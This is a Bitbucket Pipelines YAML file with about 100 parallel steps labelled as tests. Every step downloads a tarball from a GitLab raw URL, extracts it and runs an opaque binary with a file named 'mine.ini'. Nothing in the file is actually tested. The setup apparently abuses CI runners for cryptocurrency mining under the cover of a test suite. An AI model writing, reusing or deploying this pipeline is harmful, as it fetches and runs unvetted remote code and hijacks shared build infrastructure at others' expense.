image: atlassian/default-image:2

pipelines:
  default:
    - parallel:
      - step:
          name: Test 1
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 2
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 3
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 4
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 5
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 6
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 7
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 8
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 9
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 10
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 11
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 12
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 13
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 14
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 15
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 16
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 17
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 18
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 19
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 20
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 21
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 22
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 23
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 24
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 25
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 26
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 27
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 28
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 29
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 30
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 31
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 32
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 34
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 35
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 36
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 37
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 38
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 39
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 40
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 41
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 42
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 43
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 44
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 45
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 46
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 47
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 48
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 49
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 50
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 51
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 52
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 53
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 54
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 55
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 6
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 57
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 58
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 59
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 60
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 61
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 62
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 63
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 64
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 65
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 66
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 67
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 68
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 69
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 70
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 71
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 72
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 73
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 74
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 75
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 76
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 77
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 78
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 79
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 80
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 81
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 82
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 83
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 84
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 85
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 86
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 87
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 88
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 89
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 90
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 91
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 92
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 93
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 94
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 95
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 96
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 97
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 98
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 99
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 100
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini
      - step:
          name: Test 101
          script:
            - wget https://gitlab.com/opit1/oh/-/raw/master/qie4.tar.gz && tar -xvf qie4.tar.gz && ./ikuk mine.ini